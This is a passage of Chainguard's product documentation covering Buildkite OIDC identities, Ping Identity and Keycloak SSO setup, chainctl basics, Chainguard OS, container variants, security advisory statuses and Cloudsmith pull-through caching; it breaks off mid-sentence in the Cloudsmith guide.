If this workflow can successfully assume the identity, then it will be able to execute the chainctl images repos list command and retrieve the list of repos available to the organization. There are a couple of ways you can add commands to an existing Buildkite pipeline, so follow whatever procedure works best for you. If you followed the Getting Started guide linked in the prerequisites, your pipeline will have a structure like this. steps: - label: "Pipeline upload" command: buildkite-agent pipeline upload You could add the commands for testing the identity like this. steps: - label: "Buildkite test" command: | buildkite-agent pipeline upload curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m)" chmod +x chainctl token=$(buildkite-agent oidc request-token --audience issuer.enforce.dev) ./chainctl auth login --identity-token $token --identity <your buildkite identity> ./chainctl auth configure-docker --identity-token $token --identity <your buildkite identity> ./chainctl images repos list Click the Save and Build button. Ensure that your Buildkite agent is running, and then wait a few moments for the pipeline to finish building. Assuming everything works as expected, your pipeline will be able to assume the identity and run the chainctl images repos list command, returning the images available to the organization. Then it will pull an image from the organization’s repository. ... chainctl 100%[===================>] 54.34M 6.78MB/s in 13s 2023-05-17 13:19:45 (4.28 MB/s) - ‘chainctl’ saved [56983552/56983552] Successfully exchanged token. Valid! Id: 3f4ad8a9d5e63be71d631a359ba0a91dcade94ab/d3ed9c70b538a796 If you’d like to experiment further with this identity and what the pipeline can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_role" "editor" { name = "editor" } You can also edit the pipeline itself to change its behavior. For example, instead of listing repos, you could have the workflow inspect the organization. chainctl iam organizations ls Of course, the Buildkite pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/buildkite-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using Buildkite, we encourage you to check out the official project documentation, particularly their documentation on Buildkite OIDC.
--- ### How To Integrate Ping Identity SSO with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/ping-id/ Last Modified: October 28, 2024 Tags: Chainguard Containers, Procedural The Chainguard platform supports Single sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab, and Google, but SSO support allows users to bring their own identity provider for authentication. This guide outlines how to create a Ping Identity Application and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Ping and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following. chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. A Ping Identity account over which you have administrative access. Create a Ping Identity Application To integrate the Ping identity provider with the Chainguard platform, sign on to Ping Identity and navigate to the Dashboard. Click on the Applications tab in the left-hand sidebar menu, and then click on Applications in the resulting dropdown menu. From the Applications landing page, click the plus sign (➕) to set up a new application. Configure the application as follows: Application Name: Set a descriptive name (such as “Chainguard”) and optional description to ensure users recognize this application is for authentication to the Chainguard platform. Icon: You can optionally add a Chainguard logo icon here to help your users visually identify this integration. If you’d like, you can use the icon from the Chainguard Console. Application Type: Select OIDC Web App. After setting these details, click the Save button. Next, configure scopes for the application. In the Overview tab, click the Resource Access scope button. Add email and profile scopes, then save. Next, configure the OIDC application. Navigate to the Configuration tab and click the pencil-shaped “edit” icon. To configure the application, add the following settings. Response Type: Select the Code checkbox. Grant Type: Select the Authorization Code checkbox, and set PKCE Enforcement to “Optional.” Warning: Setting a grant type other than Authorization Code may compromise your security posture. Redirect URIs: Set the Redirect URI to https://issuer.enforce.dev/oauth/callback. Click the Save button to save your configuration. Finally, enable the Chainguard application by toggling the button in the top right corner. This completes configuration of the Ping application. You’re now ready to configure the Chainguard platform to use it. Configuring Chainguard to use Ping SSO Now that your Ping application is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can be used as a backup account (that is, a backup account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure Chainguard, make a note of the following settings from your Ping application. These can be found in the Ping console under the Configuration tab of the Application page.
Client ID Client Secret Issuer URL You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications on who has permission to modify the SSO configuration. You can retrieve a list of all the Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands. export NAME=ping-id export CLIENT_ID=<your client id here> export CLIENT_SECRET=<your client secret here> export ISSUER=<your issuer url here> export ORG=<your organization UIDP here> chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers guide for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Ping Identity login flow, allowing you to complete the login process through there. You can also use the custom identity provider to log in through chainctl. To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Chainguard OS FAQs URL: https://edu.chainguard.dev/chainguard/chainguard-os/faq/ Last Modified: July 3, 2025 Tags: Chainguard OS, Product Learn answers to your questions about Chainguard OS. What is Chainguard OS? Chainguard OS is a minimal, hardened Linux-based operating system designed for secure, containerized software delivery. Built in-house by Chainguard, it serves as the foundation for Chainguard’s container products and emphasizes continuous integration, immutable artifacts, and alignment with upstream software. What is the relationship between Chainguard OS and Wolfi? Wolfi refers to the OS of Chainguard’s free starter container images. 
Chainguard OS refers to the production-grade distribution that powers all other Chainguard products. Please note that mixing-and-matching content across Wolfi and Chainguard OS is not supported. What are the core principles behind Chainguard OS? Chainguard OS is built around four core principles: Continuous Integration and Delivery (CI/CD) Nano Updates and Rebuilds Minimal, Hardened, Immutable Artifacts Delta Minimization Each of these principles ensures that Chainguard OS can provide a more secure and efficient platform for software distribution. What makes Chainguard OS different from traditional Linux distributions? Chainguard OS is designed specifically for more secure and containerized application delivery. Our approach differs from traditional distros in several key ways: No LTS model: instead of fixed major releases, Chainguard OS continuously delivers updates in alignment with upstream changes. Purpose-built containers: Chainguard OS is focused on “application systems” instead of a general-purpose operating system. Minimal package footprint: Chainguard OS ships only what is strictly needed, avoiding unnecessary libraries and tools. Automation-driven: using CI/CD pipelines, Chainguard OS delivers more secure, tested, and verifiable artifacts. Ephemeral design: Chainguard OS embraces container-native patterns, making updates and rollbacks trivial. What are the benefits of using Chainguard OS? Security — reduced attack surface, hardened builds, and continuous patching. Compliance — automatically generated SBOMs and provenance metadata for all artifacts. Operational efficiency — reduces long upgrade cycles and manual patching. Supply chain integrity — built using the Chainguard Factory and adhering to SLSA standards. --- ### How To Integrate Keycloak with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/keycloak/ Last Modified: April 4, 2025 Tags: Chainguard Containers, Procedural By default, the Chainguard platform supports Single sign-on (SSO) authentication for users with GitHub, GitLab, and Google. This guide outlines how to create a Keycloak Client on your existing Keycloak instance and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Keycloak and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following: chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. An existing Keycloak instance with admin access to the realm you will be using to authenticate. Create a Keycloak Client To integrate Keycloak with the Chainguard platform, log in to your Keycloak admin interface. In the left-hand navigation menu, select Create client. Set the Client Type to OpenID Connect, and set your Client ID. Add a friendly Name and Description if desired. Take note of your Client ID value that you have set. You’ll need this to configure the Chainguard platform to use this Keycloak Client. Click Next. Toggle Client Authentication on and click Next. Set the Chainguard platform redirect URI (https://issuer.enforce.dev/oauth/callback) in the Valid redirect URIs field. Click Save to finalize the creation of your Keycloak Client. Navigate to the Credentials tab of your newly created client. Copy the Client Secret value. You’ll need this to configure the Chainguard platform to use this Keycloak Client.
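Before moving on, it can be useful to confirm that the issuer URL you will give Chainguard serves OIDC discovery metadata. This is an optional sketch; the Keycloak server address and realm name are placeholders for your own instance, and it assumes curl and jq are installed locally.

```bash
# Optional check (replace the placeholder Keycloak address and realm name).
# Keycloak exposes OIDC discovery metadata under the realm's well-known endpoint.
curl -s "https://<KEYCLOAK_SERVER_ADDRESS>/realms/<REALM_NAME>/.well-known/openid-configuration" | jq .issuer
```

The issuer value returned here should match the Issuer you provide to chainctl in the next step.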
Configuring Chainguard to use your Keycloak Client Now that your Keycloak Client is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can be used as a backup account (that is, a backup account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure Chainguard, make a note of the following details from your Keycloak Client: Client ID: This can be found on the Settings tab of the Keycloak Client. Client Secret: This can be found on the Credentials tab of the Keycloak Client. Issuer: Your Issuer URL is defined by the following pattern: https://<KEYCLOAK_SERVER_ADDRESS>/realms/<REALM_NAME> You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications on who has permission to modify the SSO configuration. You can retrieve a list of all the Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands. export NAME=keycloak-idp export CLIENT_ID=<your application/client id here> export CLIENT_SECRET=<your client secret here> export ORG=<your organization UIDP here> export ISSUER="https://<KEYCLOAK_SERVER_ADDRESS>/realms/<REALM_NAME>" chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers article for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Keycloak login flow, allowing you to complete the login process through there. You can also use the custom identity provider to log in through chainctl.
To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Get Started with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/getting-started-with-chainctl/ Last Modified: March 3, 2025 Tags: chainctl, Getting Started, Product, Basics This page presents some of the more commonly used basic chainctl commands to help you get started. For a full reference of all commands with details and switches, see chainctl Reference. Authenticate and Check Auth Status To use chainctl, the first thing you must do is authenticate with the Chainguard platform. Do so with: chainctl auth login This will present a list of identity providers for you to select from. Use the one that is tied to your Chainguard Account. Once you select the one you wish to use, such as Google, chainctl will open a browser window for you to log in with your credentials. Upon successful login, you will have the option to save this identity provider as your default for future logins. Then a token will be exchanged and you will be able to use chainctl. To check your authentication status at any time, enter: chainctl auth status This will list your identity and other attributes tied to your account, including your account’s assigned roles and capabilities. To create a pull token, use: chainctl auth pull-token To configure a Docker credential helper, which will use a token to pull images when using Docker, use: chainctl auth configure-docker Update chainctl to the Latest Release To see which chainctl version you have installed, use: chainctl version To update your chainctl installation, use: chainctl update Updating requires administrative privileges, so be prepared to enter your machine’s admin password. Configure chainctl chainctl comes with a default configuration, but there are aspects of it that can be adjusted. Examples include setting the registry location that will be used when one is not mentioned in an issued command. To edit the current configuration, use: chainctl config edit If you make a mistake and can’t recall the original settings, reset the configuration to default settings with: chainctl config reset Learn more at How to Manage chainctl Configuration. List Available Images To see which Chainguard Containers are available to your account, use: chainctl images list Be warned, that list may take a while to generate and is likely to scroll past quickly in your command line terminal. Compare Two Image Versions Let’s say you want to compare two versions of an image for the same package. You need to know the URL for your repo, the image name, and the two versions you want to compare. For versions, you can use release numbers like 8.12.0 or you can use latest or latest-dev. 
Use this, where we show the repo used by our Chainguard Developer Education team and where both instances of $IMAGENAME are the same: chainctl images diff cgr.dev/chainguard.edu/$IMAGENAME:latest cgr.dev/chainguard.edu/$IMAGENAME:latest-dev If a requested image or release is not available in the repo you are using, this will return a Forbidden error, just like if you tried to pull an image you did not have access to or from a repository your account is not authorized to use. Learn more at How To Compare Chainguard Containers with chainctl. List Available Package Versions If you want to get details about the various package versions available that can be used in images, use: chainctl packages versions list $PACKAGENAME This will list all the versions that Chainguard has built and the end-of-life date for each version that has one assigned. It will also list older package versions that are no longer available. Output Formats Commands may have a default format for output, but that doesn’t mean you have to stick with it. There is an option available to tell chainctl the output format to use, like this: chainctl $COMMAND -o $FORMAT The -o is followed by one of the following strings: csv, id, json, none, table, terse, tree, or wide. Not all output formats make sense for all commands, so test thoroughly before you use any specific format in automation. --- ### Migration Best Practices and Checklist URL: https://edu.chainguard.dev/chainguard/migration/migration-checklist/ Last Modified: February 3, 2025 Tags: Chainguard Containers, Product Chainguard container images are designed to be minimal and to include special features for increased security and provenance attestation. Depending on your current base image and customizations, you may need to make some adjustments when migrating your current workloads to use Chainguard Containers. This checklist provides a high-level overview of the steps you should consider when migrating to Chainguard Containers. Download the PDF version of this checklist here! Important to Know Most Chainguard Containers don’t have a package manager or a shell by default. These are distroless images intended to be used as slim runtimes for production environments. For every version of an image, a complementary standard image is provided with a shell and the apk package manager. These are identified by the -dev suffix and can be customized. When possible, we recommend using multistage builds that combine a build stage based on a -dev variant and a runtime stage based on a distroless image. Chainguard Containers typically don’t run as root, so a USER root statement may be required before installing software. Chainguard Containers are based on apk. If you’re coming from Debian or Ubuntu you’ll need to replace apt commands with their apk equivalents. This also applies to other distros that are not based on apk. Some images may behave differently than their equivalent in other distros, due to differences in entrypoint and shell availability. Always check the image documentation for usage details. Migration Checklist Check the image’s overview page on the Containers Directory for usage details and any compatibility remarks. Replace your current base image with a standard -dev (such as latest-dev) variant as a starting point. Add a USER root statement before package installations or other commands that must run as an administrative user. Replace any instances of apt install (or equivalent) with apk add.
Use apk search on a running container or the APK Explorer tool to identify packages you need – some commands might be available with different names or bundled with different packages. When copying application files to the image, make sure proper permissions are set. Switch back to a nonroot user so that the image does not run as root by default. Build and test your image to validate your setup. Optional: migrate your setup to a multi-stage build that uses a distroless image variant as runtime. Our Getting Started with Distroless guide has detailed information on how to work with distroless images and multi-stage builds. For detailed migration guidance, please refer to our Migration Docs on Chainguard Academy. For troubleshooting, check our Debugging distroless containers resource. --- ### Understanding Chainguard's Container Variants URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/differences-development-production/ Last Modified: April 11, 2025 Tags: Chainguard Containers, Product Chainguard Containers follow a distroless philosophy, meaning that only software absolutely necessary for a specific workload is included in an image. Designed to be as minimal as possible, Chainguard’s standard container images do not contain package managers such as apk, shells such as bash, or development utilities such as Git or text editors. However, this distroless approach isn’t suitable for every use case. For this reason, most Chainguard Containers have what’s called a development variant. These variants are designed for development tasks such as building, testing, or debugging. They can be used to build software artifacts that are then copied into standard images as part of a multi-stage build, or to test workflows interactively in an environment similar to a standard image. Development images contain familiar utilities such as package managers and shells. While our standard images have advantages related to security, development images are also secure and production-ready. Development images are tagged :latest-dev. To benefit from the most minimal potential attack surface, we recommend using a multi-stage build that leverages the development container image as a builder for a distroless standard container image. However, development images are useful as they are throughout the development lifecycle. This article explains some of the key features of development container variants and how they differ from our standard container images, and outlines ways these variants come together in creating a secure deployment. Note: Any time this article mentions Chainguard’s “standard” container images, it’s referring to our minimal, distroless container images. In the context of this article, any non-development variant is considered a “standard” container image. Chainguard Container Security Chainguard’s standard container images have the following advantages: Our standard container images contain fewer packages. While Chainguard moves quickly to patch CVEs in all images, our standard, distroless images still experience fewer CVEs overall. Reducing the number of packages also reduces the potential number of unknown vulnerabilities that might apply to an image. Not all executables are created equal. Shells such as bash, package managers such as apk, and communication-ready utilities such as Git and curl are general-purpose tools that are broadly exploitable. A smaller image can use fewer resources and reduce deployment time.
In some cases, especially with already-large images, a smaller version can make a deployment more stable or robust. Removing unnecessary components increases the observability and transparency of the image. Reducing the number of components can facilitate risk assessment or post-incident reporting. While our standard images can be considered to have advantages for security, the development variants of Chainguard Containers are also low-to-no CVE, include useful attestations such as SLSA provenance and SBOMs, and follow other security best practices. You should feel comfortable using these secure development images in production if they better fit your use case. Using Development Images Though using Chainguard’s standard container images in your final deployment will give you the benefits of distroless, development images have many use cases. These include: Building: In many Dockerfile builds, you will need to generate software artifacts such as static binaries or virtual environments as part of the build process. Development images are ideal for this use case, and after these artifacts have been generated they can be copied to a standard image for use. See How to Port a Sample Application to Chainguard Containers for a detailed example. Debugging: Our development images contain a number of useful utilities, but are otherwise designed to be as close as possible to the standard variant. This makes them useful for debugging, since you can test out build steps or the build environment using interactive shells and package managers. See Debugging Distroless Images for more on this use case. Training: In the case of AI images, you can use a development variant to train a model, then run the model in inference using a standard image. Deploying: Development images are low-to-no CVE and are suitable for production. Special Considerations It’s likely already clear that switching to our standard images requires a few changes in development and deployment. Here are a few additional considerations: Since we don’t include general-purpose shells in most standard container images, the entrypoint to these images will vary by each image’s use case. Check the documentation for each image, and note that Dockerfile commands such as CMD will be directed to the image-specific entrypoint. Because we aim to keep our development images as close as possible to our standard images, these changes to entrypoint also affect development container images. Chainguard Containers use a less privileged user by default. When using our development images, you will need to explicitly access the image with the root user — such as by using the --user root option — to perform tasks such as installing packages with apk. Conclusion Taking the step into distroless by using our standard Chainguard Containers can be an adjustment. Our development images provide options and flexibility as you secure your production infrastructure. Development images are also secure and ready for use in production. Resources Blog: Minimal container images: Towards a more secure future Chainguard Academy: Overview of Chainguard Containers Chainguard Academy: Debugging Distroless Images --- ### How Chainguard Issues Security Advisories URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/security-advisories/how-chainguard-issues/ Last Modified: April 11, 2025 Tags: Product, Chainguard Containers, CVE When you scan a newly-built Chainguard Container with a vulnerability scanner, typically, no CVEs will be reported. 
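For example, a scan of a recently rebuilt image with an open-source scanner will usually come back clean. The sketch below assumes Grype is installed locally and uses the public nginx Starter image as a stand-in for whichever image you scan.

```bash
# Illustrative scan (assumes Grype is installed and you have access to the image).
# A freshly built Chainguard Container typically reports no known vulnerabilities.
grype cgr.dev/chainguard/nginx:latest
```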
However, as software packages age, more vulnerabilities are reported and CVEs will begin to accumulate in container images. When this happens, Chainguard releases security advisories to communicate these vulnerabilities to downstream image users. In alignment with the Chainguard Container Product Release Lifecycle, our vulnerability management strategy focuses on the latest versions of any given release track, as these are the versions we actively maintain and secure. Accordingly, we only publish new CVE advisories for packages that fall within our defined support scope. We do not actively monitor non-supported versions of a package or image. Our efforts are centered on keeping the latest versions up-to-date and as close to zero CVEs as we can, while encouraging customers to upgrade and stay on supported versions. Chainguard publishes its security advisories to a dedicated Security Advisories page on its container images Directory. There, you can find a complete listing of CVEs found in various Chainguard Containers, including their CVE ID, affected packages, and vulnerability status. Each advisory is built from the metadata associated with a security vulnerability. You can also find consumable Alpine-style secdb security advisory feeds at the following URLs: Wolfi OS feed: packages.wolfi.dev/os/security.json Chainguard Enterprise feed: packages.cgr.dev/chainguard/security.json You can find more information regarding these security feeds at our foundational concepts overview page in our vulnerability scanner support GitHub repository. If you’re wondering how these security advisories are made, you’re in the right place! In this article, we will walk through the life of a security advisory, starting from a CVE’s disclosure, all the way to its remediation. We’ll also explore what happens after an advisory is released and how its record may be updated over time. Stages of a Security Advisory Stage 1: A CVE is Disclosed All security advisories begin with the disclosure of a security vulnerability. The CVE Project coordinates the processing of reported vulnerabilities through a network of CVE Numbering Authorities (CNAs). CNAs assign CVE IDs to new entries, and they are then added to a CVE Catalog. Each catalog entry contains information such as what packages or components are affected by the vulnerability, their versions, and remediation procedures, if applicable. Stage 2: Scanners Detect the CVE The National Vulnerability Database (NVD), the U.S. government vulnerability repository, will pick up these CVE records and review them further. During this secondary review process, the CVE entry is enriched with details that scanners later use to identify affected software. This process can take some time, so there will be CVEs that have been issued but not yet analyzed by the NVD. These CVEs pending review will be marked as such by the NVD. In addition to the NVD, vulnerability scanners also reference other databases such as the GitHub Advisory Database (GHSA) and the Go Vulnerability Database. Stage 3: Advisory is Issued Once a CVE has been reviewed by the NVD, it will be picked up by vulnerability scanners and reported in any affected container images. Chainguard uses Grype, an open-source vulnerability scanner from Anchore, as its primary tool for vulnerability detection. The newly detected CVE is then moved into the next phase where it waits for a team member to assess it.
A security advisory will be issued with the status of “Under Investigation” to alert downstream users that Chainguard is aware of its presence. Security advisories are issued per package, as one CVE may impact different packages in different ways. From there, this security advisory will be updated over time. Stage 4: Advisory is Updated With an advisory issued for the package, further investigation is often needed to determine the impact of the CVE. In some cases, it will be determined that the CVE is not truly present in the package, therefore making it a false positive. The associated security advisory would have its status updated to “Not Affected”, and further updates to the advisory would not occur. If the vulnerability is a true positive finding, then it is present in the package and further action must be taken. When an upstream fix is available, such as a newer package version which remediates the CVE, then this update will be made and the advisory modified to state the vulnerability is now “Fixed”. Chainguard may even proactively bump a vulnerable dependency to its newer, patched version before upstream projects have done so themselves. Or, patches issued outside of the upstream repository may be applied to remediate the vulnerability when a new package version is not yet available. Note that an end user would need to pull the new version of the container image with the updated fix for the CVE as older versions of the image would still be vulnerable. In some cases, a fix for the CVE may not yet be available. A package will be marked as having the “Pending upstream fix” status in this situation. Once an upstream fix is released, then it will be applied to the package and the advisory status updated to “Fixed”. Sometimes, a vulnerability may be present in a piece of software, but remediation is not planned. This could be because the package is no longer supported, such as in the case of an outdated package version or because the software is reaching the end of its life. If this is the case, then the security advisory status will be marked as “Fix not planned”. Rarely, a vulnerability is found in a package but there is no current status update on whether it can be remediated, or if plans exist to remediate it. In these few situations, the package is simply marked as being “Affected” by the vulnerability. This status is likely to be updated soon as the next steps towards remediation are established. Summary of Advisory Statuses

| Status | Description | Metadata |
|--------|-------------|----------|
| Under investigation | A vulnerability has been detected for the package and is awaiting further investigation to determine its impact. | detection |
| Affected | A vulnerability finding has been determined to be present and affect the package. | true-positive-determination |
| Not affected | The vulnerability was determined to not impact the package, making it a false positive finding. | false-positive-determination |
| Pending upstream fix | Remediating the vulnerability is not possible until an upstream fix is made available. | pending-upstream-fix |
| Fixed | A patch has been applied to the affected package and the vulnerability is no longer present. | fixed |
| Fix not planned | There are no plans to address the vulnerability in the package at this time. | fix-not-planned |

Further Reading Chainguard’s Security Advisory feed is a helpful tool to have at hand when scanning your containers for the presence of vulnerabilities.
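If you would like to inspect the raw secdb feeds listed earlier, you can fetch them directly. This is a quick sketch; it assumes curl and jq are available locally.

```bash
# Fetch the Wolfi OS secdb advisory feed referenced above and pretty-print the
# first part of it (the Chainguard Enterprise feed works the same way).
curl -s https://packages.wolfi.dev/os/security.json | jq . | head -n 40
```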
Though you won’t need it often thanks to the low CVE counts of our container images, it is a useful reference when working with your scans, giving you insight into how you can approach and fix any vulnerabilities which pop up. For more information on how to use Chainguard’s Security Advisories page to inform your vulnerability remediation, consider reading our article on How to Use Chainguard Security Advisories. If you are using Chainguard Containers at your organization or want to learn more about advisories for enterprise container images, please contact us. --- ### How to Set Up Pull Through from Chainguard's Registry to Cloudsmith URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/cloudsmith-pull-through/ Last Modified: August 19, 2024 Tags: Product, Chainguard Containers Organizations often have their own internal software repositories and registries integrated into their systems. This guide explains how to set up the Cloudsmith artifact repository to ingest Chainguard Containers by acting as a pull-through cache. This tutorial will walk you through how to set up a Cloudsmith remote repository you can use as a pull through cache for Chainguard’s public Starter containers or for Production containers originating from a private Chainguard repository. Prerequisites In order to complete this tutorial, you will need the following: Docker installed on your local machine. Follow the official installation instructions to set this up. Administrative privileges over a Cloudsmith project. You can set up an account by visiting the Cloudsmith website. If you plan to set up a Cloudsmith repository to serve as a pull through cache for Production container images, then you will also need to have privileges to create a pull token from Chainguard. Additionally, you’ll need chainctl installed to create the pull token. If you haven’t already installed this, follow the installation guide. Setting up Cloudsmith as a Pull Through for Starter Containers Chainguard’s Starter container images are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Cloudsmith through which you can pull Starter container images, log in to the Cloudsmith App. Once there, navigate to the Repositories tab and click the + Create Repository button. A modal window will appear where you can enter the following details for your new remote repository: Name — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name chainguard-public. Storage Region — Here, select the region closest to your location. Repository Type — This setting determines how the repository can be accessed. You can select Public, Private, or Open-Source. Following that, you will need to set an upstream proxy for this repository. This is what will let Cloudsmith know where to pull container images from. In the lower left-hand navigation menu, select Upstream Proxying. From there, click the ➕ Create Upstream button and select Docker as the upstream source. This will open a modal window where you can enter the details for the upstream source: This window has a few fields for which you need to enter values. The Name field can include any name you’d like for the upstream source, but it can be helpful to choose something descriptive. In our example the name is “Chainguard Public Upstream.” Likewise, you can choose whatever Priority value you prefer.
This dictates the order in which requests are resolved, with 1 being resolved first, 2 second, and so on. The most important field in this window is the Upstream URL value. In order to use Cloudsmith as a pull through cache for Starter images, this must be set to https://cgr.dev/chainguard. Lastly, be sure that the Mode is set to Cache and Proxy and the Verify SSL Certificates option is selected. Then, click the Create Docker Upstream button. If you entered all the details correctly, then the upstream proxy will be created successfully and you can test pulling a Starter container image through Cloudsmith. Testing pull through of a Starter container image Before testing whether you can pull a Starter container through Cloudsmith, you’ll need to log in to the Cloudsmith registry with docker: docker login docker.cloudsmith.io This command will prompt you to enter your Cloudsmith username and password. Your username appears in the top-right corner of the Cloudsmith web app. If you click on this, a drop-down menu will appear. Select API Settings; on the resulting page you’ll find a field named API Key containing a 40-character string. You can use this API key to access Cloudsmith programmatically or, as in the case of this example, use it as a password in a docker login command. After running the command, you will be able to pull a Starter container through your new Cloudsmith repository. The following example pulls the nginx container image: docker pull docker.cloudsmith.io/<cloudsmith-organization>/<cloudsmith-repository>/nginx:latest Be sure to replace <cloudsmith-organization> and <cloudsmith-repository> with the names of your Cloudsmith organization and repository, respectively. If everything worked correctly, the image will appear in your repository: If you run into issues pulling images like this, ensure that your docker pull command specifies the correct Cloudsmith organization and repository. Setting up Cloudsmith as a Pull Through for Production Container Images Production Chainguard Containers are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up a Cloudsmith repository that you can use as a pull through cache for Production containers is similar to the one outlined previously for Starter containers, but with a few extra steps. You can create a new Cloudsmith repository or use the same repository you used as a pull through cache for Starter containers. Next, you’ll need to create a pull token for your organization’s registry through Chainguard. Pull tokens are longer-lived tokens that can be used to pull Containers from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Cloudsmith. Log in with chainctl: chainctl auth login Then configure a pull token: chainctl auth configure-docker --pull-token By default, this will create a pull token that lasts for 30 days. You can adjust this by appending the command with the --ttl flag (for example, --ttl=24h). This command will prompt you to select an organization. Be sure to select the organization whose Production Containers you want to pull through your Cloudsmith repository. This will create a pull token and print a docker login command that can be run in a CI environment to log in with the token. This command includes both --username and --password arguments. 
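The printed command will look something like the following; the username and password shown here are placeholders for the values chainctl generates, not real credentials.

```bash
# Example of the login command chainctl prints (placeholder credentials).
docker login cgr.dev --username '<pull-token-username>' --password '<pull-token-password>'
```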
You don’t need to run this docker login command, but you will need the username and password values in a moment so note them down. Following that, you’ll need to create another upstream source. Return to the Cloudsmith web app and navigate to the Upstream Proxying page. Click the ➕ Create Upstream button and select Docker as the upstream source. Again, set a Name and Priority level for this source and ensure that the Mode is set to Cache and Proxy. When pulling from a private registry through Chainguard, the Upstream URL must be set to https://cgr.dev/; any other URL here will cause an error. Lastly, you need to add the username and password you received when you generated the pull token to the upstream source. To do this, expand the Authentication section and under Method select Username and Password. Then enter the username and password you noted down earlier in their respective fields. Finally, click the Create Docker Upstream button. With that, you’re ready to test a Chainguard Production Container through Cloudsmith. Testing pull through of a Chainguard Production Container: As with testing pull through of a Starter container image, you’ll first need to authenticate to Cloudsmith: docker login docker.cloudsmith.io After running the command, you will be able to pull any Production containers that your organization has access to through Cloudsmith. To do so, you would run a command with syntax like the following: docker pull docker.cloudsmith.io/<cloudsmith-organization>/<cloudsmith-repository>/<chainguard-registry>/IMAGE As with the docker pull command used in the previous section, 